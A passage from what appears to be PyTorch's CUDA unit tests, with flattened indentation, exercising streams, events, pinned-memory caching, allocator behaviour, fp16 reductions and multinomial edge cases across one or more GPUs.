d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.default_stream()
with torch.cuda.device(d1):
s1 = torch.cuda.default_stream()
s2 = torch.cuda.default_stream(device=0)
s3 = torch.cuda.default_stream(d1)
self.assertEqual(d0, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(d1, s3.device)
self.assertEqual(s0, s2)
self.assertEqual(s1, s3)
with torch.cuda.device(d0):
self.assertEqual(torch.cuda.current_stream(), s0)
with torch.cuda.device(d1):
self.assertEqual(torch.cuda.current_stream(), s1)
with self.assertRaisesRegex(ValueError,
"Expected a cuda device, but got: cpu"):
torch.cuda.default_stream(torch.device('cpu'))
@skipCUDANonDefaultStreamIf(True)
def test_streams(self):
default_stream = torch.cuda.current_stream()
user_stream = torch.cuda.Stream()
self.assertEqual(torch.cuda.current_stream(), default_stream)
self.assertNotEqual(default_stream, user_stream)
self.assertEqual(default_stream.cuda_stream, 0)
self.assertNotEqual(user_stream.cuda_stream, 0)
with torch.cuda.stream(user_stream):
self.assertEqual(torch.cuda.current_stream(), user_stream)
self.assertTrue(user_stream.query())
tensor1 = torch.ByteTensor(5).pin_memory()
tensor2 = tensor1.cuda(non_blocking=True) + 1
default_stream.synchronize()
self.assertTrue(default_stream.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_event_device(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
e0 = torch.cuda.Event()
self.assertEqual(None, e0.device)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.Stream()
e1 = s1.record_event()
self.assertEqual(s0.device, torch.device('cuda:0'))
self.assertEqual(e0.device, torch.device('cuda:0'))
self.assertEqual(s1.device, torch.device('cuda:1'))
self.assertEqual(e1.device, torch.device('cuda:1'))
def test_stream_event_repr(self):
s = torch.cuda.current_stream()
self.assertTrue("torch.cuda.Stream" in s.__repr__())
e = torch.cuda.Event()
self.assertTrue("torch.cuda.Event" in e.__repr__())
s.record_event(e)
self.assertTrue("torch.cuda.Event" in e.__repr__())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_context(self):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.Stream(device=1)
s2 = torch.cuda.Stream(device=0)
with torch.cuda.device(s1.device):
prev_stream_on_cuda1 = torch.cuda.current_stream()
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
with torch.cuda.stream(s1):
self.assertEqual(torch.cuda.current_stream(), s1)
self.assertEqual(1, torch.cuda.current_device())
with torch.cuda.stream(s2):
self.assertEqual(torch.cuda.current_stream(), s2)
self.assertEqual(0, torch.cuda.current_device())
with torch.cuda.stream(s0):
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
self.assertEqual(torch.cuda.current_stream(), s2)
self.assertEqual(0, torch.cuda.current_device())
self.assertEqual(torch.cuda.current_stream(), s1)
self.assertEqual(1, torch.cuda.current_device())
with torch.cuda.device(s1.device):
self.assertEqual(prev_stream_on_cuda1, torch.cuda.current_stream())
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu(self):
default_stream = torch.cuda.current_stream()
self.assertEqual(default_stream.device, torch.device('cuda:0'))
stream = torch.cuda.Stream(device=1)
self.assertEqual(stream.device, torch.device('cuda:1'))
with torch.cuda.device(1):
self.assertEqual(
torch.cuda.current_stream().device, torch.device('cuda:1'))
self.assertNotEqual(torch.cuda.current_stream(), default_stream)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu_query(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
torch.cuda.synchronize(d0)
torch.cuda.synchronize(d1)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
self.assertTrue(s0.query())
self.assertFalse(s1.query())
with torch.cuda.device(d0):
self.assertTrue(s0.query())
self.assertFalse(s1.query())
with torch.cuda.device(d1):
self.assertTrue(s0.query())
self.assertFalse(s1.query())
# deliberately using a different device
with torch.cuda.device(d0):
s1.synchronize()
self.assertTrue(s0.query())
self.assertTrue(s1.query())
with torch.cuda.device(d0):
self.assertTrue(s0.query())
self.assertTrue(s1.query())
with torch.cuda.device(d1):
self.assertTrue(s0.query())
self.assertTrue(s1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu_eq(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream()
with torch.cuda.device(d1):
s2 = torch.cuda.current_stream()
s3 = torch.cuda.current_stream()
self.assertTrue(s0 == s0)
self.assertTrue(s0 == s1)
self.assertTrue(s2 == s2)
self.assertTrue(s2 == s3)
self.assertFalse(s0 == s2)
self.assertFalse(s1 == s3)
self.assertEqual(s0.device, s1.device)
self.assertEqual(s0.cuda_stream, s1.cuda_stream)
self.assertEqual(s2.device, s3.device)
self.assertEqual(s2.cuda_stream, s3.cuda_stream)
self.assertNotEqual(s0.device, s3.device)
self.assertEqual(hash(s0), hash(s1))
self.assertEqual(hash(s2), hash(s3))
self.assertNotEqual(hash(s0), hash(s3))
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
def test_streams_priority(self):
low, high = torch.cuda.Stream.priority_range()
s0 = torch.cuda.Stream(device=0, priority=low)
self.assertEqual(low, s0.priority)
self.assertEqual(torch.device('cuda:0'), s0.device)
s1 = torch.cuda.Stream(device=1, priority=high)
self.assertEqual(high, s1.priority)
self.assertEqual(torch.device('cuda:1'), s1.device)
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
def test_tensor_device(self):
self.assertEqual(torch.cuda.FloatTensor(1).get_device(), 0)
self.assertEqual(torch.cuda.FloatTensor(1, device=1).get_device(), 1)
with torch.cuda.device(1):
self.assertEqual(torch.cuda.FloatTensor(1).get_device(), 1)
self.assertEqual(torch.cuda.FloatTensor(1, device=0).get_device(), 0)
self.assertEqual(torch.cuda.FloatTensor(1, device=None).get_device(), 1)
def test_events(self):
stream = torch.cuda.current_stream()
event = torch.cuda.Event(enable_timing=True)
self.assertTrue(event.query())
start_event = torch.cuda.Event(enable_timing=True)
stream.record_event(start_event)
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
stream.record_event(event)
self.assertFalse(event.query())
event.synchronize()
self.assertTrue(event.query())
self.assertGreater(start_event.elapsed_time(event), 0)
@staticmethod
def _stream_synchronize(self, spin_time_cycles):
s = torch.cuda.current_stream()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
e_tik.record(s)
torch.cuda._sleep(spin_time_cycles)
e_tok.record(s)
s.synchronize()
self.assertTrue(s.query())
# not necessary to check e_tik and e_tok, as elapsed_time would throw
# exception if otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _event_synchronize(self, spin_time_cycles):
s = torch.cuda.current_stream()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
e_tik.record(s)
torch.cuda._sleep(spin_time_cycles)
s.record_event(e_tok)
e_tok.synchronize()
self.assertTrue(s.query())
# not necessary to check e_tik and e_tok, as elapsed_time would throw
# exception if otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _event_wait(self, spin_time_cycles):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.Stream()
e_tik = torch.cuda.Event(blocking=True, enable_timing=True)
e_tok = torch.cuda.Event(blocking=True, enable_timing=True)
e_tik.record(s0)
torch.cuda._sleep(spin_time_cycles - 10)
e_sync = torch.cuda.Event(blocking=True)
e_sync.record()
e_sync.wait(s1)
with torch.cuda.stream(s1):
torch.cuda._sleep(10)
s1.synchronize()
e_tok.record()
e_tok.synchronize()
self.assertTrue(s0.query())
self.assertTrue(s1.query())
self.assertTrue(e_sync.query())
# not necessary to check e_tik and e_tok, as elapsed_time would throw
# exception if otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _test_stream_event_nogil(self, sync_func, p2c, c2p):
with torch.cuda.device('cuda:1'):
c2p.put(0)
p2c.get()
c2p.put(sync_func(self, TestCuda.FIFTY_MIL_CYCLES))
# Skip the test for ROCm as per https://github.com/pytorch/pytorch/issues/53190
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_event_nogil(self):
for sync_func in [TestCuda._stream_synchronize,
TestCuda._event_synchronize,
TestCuda._event_wait]:
p2c = queue.Queue()
c2p = queue.Queue()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
t = threading.Thread(
target=TestCuda._test_stream_event_nogil,
args=(self, sync_func, p2c, c2p))
t.daemon = True
t.start()
c2p.get()
with torch.cuda.device('cuda:0'):
e_tik.record()
p2c.put(0)
parent_time = sync_func(self, TestCuda.FIFTY_MIL_CYCLES)
child_time = c2p.get()
e_tok.record()
e_tok.synchronize()
total_time = e_tik.elapsed_time(e_tok)
# Without GIL, synchronizations in parent and child threads can
# overlap. The total execution time should be a little bit longer
# than spinning fifty million cycles and much shorter than twice of
# that. However, testing absolute execution time is not reliable as
# it may vary on different hardware in different environments.
# Therefore, this test uses relative comparisons, checking if the
# sum of parent and child threads execution time is greater than the
# real execution time by least 40%.
self.assertGreater(parent_time + child_time, total_time * 1.4)
# This test is flaky for ROCm, see issue #62602
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_events_wait(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
torch.cuda.synchronize(d0)
torch.cuda.synchronize(d1)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
e0 = torch.cuda.Event()
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
self.assertFalse(s0.query())
self.assertTrue(s1.query())
s1.wait_event(e0)
s1.synchronize()
self.assertTrue(e0.query())
self.assertTrue(s0.query())
self.assertTrue(s1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_events_multi_gpu_query(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e0 = s0.record_event()
s0.synchronize()
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
e1 = s1.record_event()
self.assertTrue(e0.query())
self.assertFalse(e1.query())
with torch.cuda.device(d0):
self.assertTrue(e0.query())
self.assertFalse(e1.query())
with torch.cuda.device(d1):
self.assertTrue(e0.query())
self.assertFalse(e1.query())
# deliberately using a different device
with torch.cuda.device(d0):
e1.synchronize()
self.assertTrue(e0.query())
self.assertTrue(e1.query())
with torch.cuda.device(d0):
self.assertTrue(e0.query())
self.assertTrue(e1.query())
with torch.cuda.device(d1):
self.assertTrue(e0.query())
self.assertTrue(e1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
@skipIfRocm
def test_events_multi_gpu_elapsed_time(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e0 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(10)
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
e1 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
s1.record_event(e1)
e0.synchronize()
e1.synchronize()
with torch.cuda.device(d0):
with self.assertRaises(RuntimeError):
self.assertGreater(e0.elapsed_time(e1), 0)
with torch.cuda.device(d1):
with self.assertRaises(RuntimeError):
self.assertGreater(e0.elapsed_time(e1), 0)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e2 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
s0.record_event(e2)
s0.synchronize()
self.assertGreater(e0.elapsed_time(e2), 0)
# deliberately calling from a different device
with torch.cuda.device(d1):
self.assertGreater(e0.elapsed_time(e2), 0)
def test_record_stream(self):
cycles_per_ms = get_cycles_per_ms()
t = torch.FloatTensor([1, 2, 3, 4]).pin_memory()
result = torch.cuda.FloatTensor(t.size())
stream = torch.cuda.Stream()
ptr = [None]
# Performs the CPU->GPU copy in a background stream
def perform_copy():
with torch.cuda.stream(stream):
tmp = t.cuda(non_blocking=True)
ptr[0] = tmp.data_ptr()
torch.cuda.current_stream().wait_stream(stream)
tmp.record_stream(torch.cuda.current_stream())
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
result.copy_(tmp)
perform_copy()
with torch.cuda.stream(stream):
tmp2 = torch.cuda.FloatTensor(t.size())
tmp2.zero_()
self.assertNotEqual(tmp2.data_ptr(), ptr[0], msg='allocation re-used to soon')
self.assertEqual(result.tolist(), [1, 2, 3, 4])
# Check that the block will be re-used after the main stream finishes
torch.cuda.current_stream().synchronize()
with torch.cuda.stream(stream):
tmp3 = torch.cuda.FloatTensor(t.size())
self.assertEqual(tmp3.data_ptr(), ptr[0], msg='allocation not re-used')
def test_record_stream_on_shifted_view(self):
# See issue #27366
# This test detects unexpected block reallocation. For reliable test,
# the stream to allocate tensors is isolated. The allocator will not
# reuse free blocks which were allocated from another stream.
stream_alloc = torch.cuda.Stream()
with torch.cuda.stream(stream_alloc):
base = torch.cuda.FloatTensor([10, 10])
# Record another stream on a shifted view tensor.
view = base[5:]
assert view.storage_offset() > 0
stream_record = torch.cuda.Stream()
with torch.cuda.stream(stream_record):
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
view.record_stream(stream_record)
# Delete those tensors to make the block free soon.
data_ptr = base.data_ptr()
del base, view
# A new tensor should not be allocated to the block above.
stream_alloc.synchronize()
with torch.cuda.stream(stream_alloc):
try_realloc = torch.cuda.FloatTensor([10, 10])
self.assertNotEqual(try_realloc.data_ptr(), data_ptr)
@contextlib.contextmanager
def _get_external_stream(self, device):
cudart = torch.cuda.cudart()
stream = ctypes.c_ulonglong(0)
stream_p = ctypes.POINTER(ctypes.c_void_p)(stream)
stream_p_int = ctypes.cast(stream_p, ctypes.c_void_p).value
with device:
try:
out = cudart.cudaStreamCreate(stream_p_int)
self.assertEqual(out, 0)
self.assertNotEqual(stream.value, 0)
yield stream.value
finally:
out = cudart.cudaStreamDestroy(stream.value)
self.assertEqual(out, 0)
@skipIfRocm
def test_external_streams(self):
device = torch.cuda.device(0)
with self._get_external_stream(device) as stream_v:
ext_stream = torch.cuda.streams.ExternalStream(stream_v)
self.assertEqual(stream_v, ext_stream.cuda_stream)
self.assertEqual(ext_stream.device.index, device.idx)
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_external_streams_multi_device(self):
device = torch.cuda.device(1)
with self._get_external_stream(device) as stream_v:
ext_stream = torch.cuda.streams.ExternalStream(
stream_v, device=device)
self.assertEqual(stream_v, ext_stream.cuda_stream)
self.assertEqual(ext_stream.device.index, device.idx)
def test_noncontiguous_pinned_memory(self):
# See issue #3266
x = torch.arange(0, 10).view((2, 5))
self.assertEqual(x.t(), x.t().pin_memory())
def test_caching_pinned_memory(self):
cycles_per_ms = get_cycles_per_ms()
# check that allocations are re-used after deletion
t = torch.FloatTensor([1]).pin_memory()
ptr = t.data_ptr()
del t
t = torch.FloatTensor([1]).pin_memory()
self.assertEqual(t.data_ptr(), ptr, msg='allocation not reused')
# check that the allocation is not re-used if it's in-use by a copy
gpu_tensor = torch.cuda.FloatTensor([0])
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
gpu_tensor.copy_(t, non_blocking=True)
del t
t = torch.FloatTensor([1]).pin_memory()
self.assertNotEqual(t.data_ptr(), ptr, msg='allocation re-used too soon')
self.assertEqual(list(gpu_tensor), [1])
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_caching_pinned_memory_multi_gpu(self):
# checks that the events preventing pinned memory from being re-used
# too early are recorded on the correct GPU
cycles_per_ms = get_cycles_per_ms()
t = torch.FloatTensor([1]).pin_memory()
ptr = t.data_ptr()
gpu_tensor0 = torch.cuda.FloatTensor([0], device=0)
gpu_tensor1 = torch.cuda.FloatTensor([0], device=1)
with torch.cuda.device(1):
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
gpu_tensor1.copy_(t, non_blocking=True)
del t
t = torch.FloatTensor([2]).pin_memory()
self.assertNotEqual(t.data_ptr(), ptr, msg='allocation re-used too soon')
with torch.cuda.device(0):
gpu_tensor0.copy_(t, non_blocking=True)
self.assertEqual(gpu_tensor1[0], 1)
self.assertEqual(gpu_tensor0[0], 2)
def test_caching_allocator_record_stream_oom(self):
"""allocations delayed by a record_stream call should still be freed on
an out-of-memory in cuda_malloc_retry. see issue #19219"""
stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
y = torch.zeros(40 * 1024 * 1024, device='cuda')
for _ in range(100):
x = torch.empty(40 * 1024 * 1024, device='cuda')
with torch.cuda.stream(stream):
y += x
# delays re-use of `x` until after all operations in `stream`
x.record_stream(stream)
del x
# we've made a mess by allocating up to the device capacity. free any
# cached blocks in case it affects future tests.
torch.cuda.empty_cache()
# Tests for historic illegal memory access, see #17040.
def test_reduction_gpu_memory_accessing(self):
x = torch.ones(512, 8, dtype=torch.float32, device='cuda')
torch.sum(x, 0)
def test_sum_fp16(self):
x = torch.zeros(10, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(), 0)
x = torch.ones(65504, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(), 65504)
self.assertEqual(x.sum(dtype=torch.float32), 65504)
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(dtype=torch.float32), 65536)
a = torch.zeros(1203611).bernoulli_(0.0005)
x = a.to(device='cuda', dtype=torch.float16)
self.assertEqual(x.sum().item(), a.sum().item())
a = torch.zeros(100, 121, 80).bernoulli_(0.0005)
x = a.to(device='cuda', dtype=torch.float16)
self.assertEqual(x.sum((0, 2)).float().cpu(), a.sum((0, 2)))
def test_mean_fp16(self):
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.mean(), 1)
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.mean(dtype=torch.float32), 1)
def test_prod_large(self):
# tests global reduction (should_global_reduce = true) in case of non-zero identity element
x = torch.ones(240000, device='cuda', dtype=torch.float32)
self.assertEqual(x.prod(), 1)
# test for complex types. Note 240k is divisible by 4
for dtype in [torch.cfloat, torch.cdouble]:
x = torch.ones(240000, device='cuda', dtype=dtype) * (0 + 1j)
self.assertEqual(x.prod(), 1)
def test_multinomial_ext(self):
# Test two corner cases from older PyTorch (Issue #4858)
freqs = torch.cuda.FloatTensor([
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.03178183361887932, 0.027680952101945877, 0.033176131546497345,
0.046052902936935425, 0.07742464542388916, 0.11543981730937958,
0.14148041605949402, 0.15784293413162231, 0.13180233538150787,
0.08271478116512299, 0.049702685326337814, 0.027557924389839172,
0.018125897273421288, 0.011851548217236996, 0.010252203792333603,
0.007422595750540495, 0.005372154992073774, 0.0045109698548913,
0.0036087757907807827, 0.0035267581697553396, 0.0018864056328311563,
0.0024605290964245796, 0.0022964938543736935, 0.0018453967059031129,
0.0010662291897460818, 0.0009842115687206388, 0.00045109697384759784,
0.0007791675161570311, 0.00020504408166743815, 0.00020504408166743815,
0.00020504408166743815, 0.00012302644609007984, 0.0,
0.00012302644609007984, 4.100881778867915e-05, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0])
torch.cuda.manual_seed(11042)
sample = torch.multinomial(freqs, 1000, True)
self.assertNotEqual(freqs[sample].min(), 0)
p = torch.zeros(3421, 2, device="cuda", dtype=torch.float)
p[:, 1] = 1
torch.cuda.manual_seed(5214)
r = torch.multinomial(p, 1)
self.assertNotEqual(r.min().item(), 0)
# test corner case from Issue #13867
torch.cuda.manual_seed(33)
probs = torch.randn(1000000, device='cuda').clamp(min=0) * 3e-5
samples = probs.multinomial(1000000, replacement=True)
self.assertGreater(probs[samples].min().item(), 0)
def _spawn_test_multinomial_invalid_probs_cuda(self, probs):
import subprocess
try:
p = subprocess.Popen([sys.executable, '-c', f"""\
import sys
import torch
from torch._six import inf, nan
try:
with torch.random.fork_rng(devices=[0]):
torch.multinomial(torch.tensor({probs}).to('cuda'), 2, replacement=True)
torch.cuda.synchronize()
sys.exit(-1) # Should not be reached
except RuntimeError as e:
sys.exit(-2)
"""], stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
out, err = p.communicate(timeout=10)
p.wait(timeout=10)
except subprocess.TimeoutExpired as e:
p.kill()
out, err = p.communicate()
expected_messages = [
'device-side assert triggered', # CUDA
'Assertion', # CUDA
'HSA_STATUS_ERROR_EXCEPTION', # ROCm
'Device-side assertion' # ROCm
]
self.assertTrue(any([msg in out or msg in err for msg in expected_messages]))
@slowTest
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
def test_multinomial_invalid_probs_cuda(self):
self._spawn_test_multinomial_invalid_probs_cuda([1., -1., 1.])
self._spawn_test_multinomial_invalid_probs_cuda([1., inf, 1.])
self._spawn_test_multinomial_invalid_probs_cuda([1., -inf, 1.])
self._spawn_test_multinomial_invalid_probs_cuda([1., 1., nan])
@slowTest
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_huge_index(self):
src = torch.empty(15000000, 45, device='cuda', dtype=torch.long).random_(0, 2**22)
idx = torch.randperm(src.shape[0], device='cuda')
res = src[idx]
res_cpu = src.cpu()[idx.cpu()]
self.assertEqual(res.cpu(), res_cpu)
def test_tensor_gather(self):
AbstractTestCases._TestTorchMixin._test_gather(self, lambda t: t.cuda(), False)
def test_tensor_scatter(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(), 'scatter_', test_bounds=False)
def test_tensor_scatterAdd(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(), 'scatter_add_', test_bounds=False)
def test_scatter_add_mult_index_base(self):
AbstractTestCases._TestTorchMixin._test_scatter_add_mult_index_base(self, lambda t: t.cuda())
def test_tensor_scatterFill(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_', True, test_bounds=False)
def test_tensor_scatter_complex(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_', test_bounds=False, test_complex=True)
def test_tensor_scatterAdd_complex(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_add_', test_bounds=False, test_complex=True)
def test_tensor_scatterFill_complex(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_', True, test_bounds=False, test_complex=True)
def test_min_max_inits(self):
# Testing if THC_reduceAll received the correct index initialization.
# This affects the result of THC_reduceAll operations at extreme values
x = torch.cuda.ByteTensor([0])
y = torch.cuda.ByteTensor([255])
expected = torch.cuda.LongTensor([0])[0]
_, v = x.max(dim=0)
self.assertEqual(v, expected)
_, v = y.min(dim=0)
self.assertEqual(v, expected)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_get_set_rng_state_all(self):
states = torch.cuda.get_rng_state_all()
before0 = torch.cuda.FloatTensor(100, device=0).normal_()
before1 = torch.cuda.FloatTensor(100, device=1).normal_()
torch.cuda.set_rng_state_all(states)
after0 = torch.cuda.FloatTensor(100, device=0).normal_()
after1 = torch.cuda.FloatTensor(100, device=1).normal_()
self.assertEqual(before0, after0, atol=0, rtol=0)
self.assertEqual(before1, after1, atol=0, rtol=0)
def test_nvtx(self):
# Just making sure we can see the symbols
torch.cuda.nvtx.range_push("foo")
torch.cuda.nvtx.mark("bar")
torch.cuda.nvtx.range_pop()
def test_bincount_ext(self):
# ensure CUDA code coverage
input_size = (5000,)
w = torch.randn(input_size, dtype=torch.double, device='cuda')
w_cpu = w.cpu()
# test shared memory impl
t = torch.randint(50, input_size, dtype=torch.int8, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
# test multi block memory impl
# see `THRESH_NUMBER_BINS_FOR_MULTI_BLOCK_MEM` in SummaryOps.cu
t = torch.randint(500, input_size, dtype=torch.int64, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
# test global memory impl
# see `THRESH_NUMBER_BINS_FOR_GLOBAL_MEM` in SummaryOps.cu
t = torch.randint(2000, input_size, dtype=torch.int64, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
t = torch.zeros([10], dtype=torch.int32, device='cuda')
# 35488 * 65536 as int32 would cause overflow to negative value
# giving negative bin offset
t[0] = 35488
counted = t.bincount(minlength=65536)
self.assertEqual(torch.sum(counted), 10)
def test_tiny_half_norm_(self):
a = torch.arange(25).cuda().float()
a /= 100000000
b = a.half()
self.assertGreater(b.norm().item(), 0)
def test_norm_type_conversion(self):
a = torch.ones(65536).cuda().half()
self.assertEqual(a.norm(p=0, dtype=torch.float32), 65536)
# Verifies that mem_get_info works, including when called for a different device
def test_mem_get_info(self):
def _test(idx):
before_free_bytes, before_available_bytes = torch.cuda.mem_get_info(idx)
t = torch.randn(1024 * 1024, device='cuda:' + str(idx))
after_free_bytes, after_available_bytes = torch.cuda.mem_get_info(idx)
self.assertTrue(after_free_bytes < before_free_bytes)
self.assertEqual(before_available_bytes, after_available_bytes)
_test(0)
if TEST_MULTIGPU:
_test(1)
# Test that wrap_with_cuda_memory_check successfully detects leak
# skip for ROCM. Look into #62533.
@skipIfRocm
def test_cuda_memory_leak_detection(self):
l = []
@self.wrap_with_cuda_memory_check
def no_leak():
pass
@self.wrap_with_cuda_memory_check
def leak_gpu0():
l.append(torch.randn(1024, device=torch.device("cuda:0")))
no_leak()
with self.assertRaisesRegex(RuntimeError, r"CUDA driver API confirmed .+ on device 0.+"):
leak_gpu0()
if TEST_MULTIGPU:
@self.wrap_with_cuda_memory_check
def leak_gpu1():
l.append(torch.randn(1024, device=torch.device("cuda:1")))
with self.assertRaisesRegex(RuntimeError, r"CUDA driver API confirmed .+ on device 1.+"):
leak_gpu1()
def test_cuda_memory_leak_detection_propagates_errors(self):
with self.assertRaisesRegex(RuntimeError, r"The size of tensor a \(3\) must match"):
with self.assertLeaksNoCudaTensors():
x = torch.randn(3, 1, device='cuda')
y = torch.randn(2, 1, device='cuda')
z = x + y
def test_trilu_indices(self):
for test_args in tri_tests_args:
_compare_trilu_indices(self, *test_args, device='cuda')
# test default options
x = torch.ones(
3, 3, dtype=torch.long, device='cuda', layout=torch.strided)
self.assertEqual(
x.tril(0).nonzero().transpose(0, 1),
torch.tril_indices(3, 3, device='cuda'))
self.assertEqual(
x.triu(0).nonzero().transpose(0, 1),
torch.triu_indices(3, 3, device='cuda'))
def test_large_trilu_indices(self):
for test_args in tri_large_tests_args:
_compare_large_trilu_indices(self, *test_args, device='cuda')
@unittest.skipIf(not TEST_MEDIUM_TENSOR, "not enough memory")
def test_cuda_kernel_loop_overflow(self):
# Issue #24309: In extreme cases, the loop variable could overflow and continue
# the kernel loop with a negative index, causing a RuntimeError (invalid write):
x = torch.randn(1, 1, 1, 2**30 + 1, dtype=torch.float16, device="cuda")
expected = x[0, 0, 0, 2**30]
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
torch.cuda.synchronize()
self.assertEqual(y[0, 0, 0, 2**30], expected)
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_cuda_kernel_loop_overflow_large(self):
# Make sure input.numel() > INT_MAX is handled:
x = torch.randn(1, 1, 1, 2**31, dtype=torch.float16, device="cuda")
with self.assertRaisesRegex(RuntimeError, "integer out of range"):
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
# Issue #24309: In extreme cases, the loop variable could overflow and continue
# the kernel loop with a negative index, causing a RuntimeError (invalid write):
x = torch.randn(1, 1, 1, 2**31 - 1, dtype=torch.float16, device="cuda")
expected = x[0, 0, 0, 2**31 - 2]
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
torch.cuda.synchronize()
self.assertEqual(y[0, 0, 0, 2**31 - 2], expected)
# this might create a reference cycle on self...
def _make_multiply_in_stream(self):
class MultiplyInStream(torch.autograd.Function):
@staticmethod
def forward(ctx, x, val):
ctx.val = val
ctx.stream = torch.cuda.current_stream()
return x * val
@staticmethod
def backward(ctx, grad):
self.assertEqual(torch.cuda.current_stream(), ctx.stream)
# delays the operation in the the background stream
torch.cuda._sleep(1000 * 5000)
return grad * ctx.val, None
return MultiplyInStream
@skipCUDANonDefaultStreamIf(True)
def test_streaming_backwards_sync(self):
default_stream = torch.cuda.current_stream()
stream = torch.cuda.Stream()
MultiplyInStream = self._make_multiply_in_stream()
# Tests using grads outside the backward() stream context
# See "Stream semantics of backward passes" on https://pytorch.org/docs/stable/notes/cuda.html
x = torch.randn(5, 5, device='cuda', requires_grad=True)
with torch.cuda.stream(stream):
stream.wait_stream(default_stream)
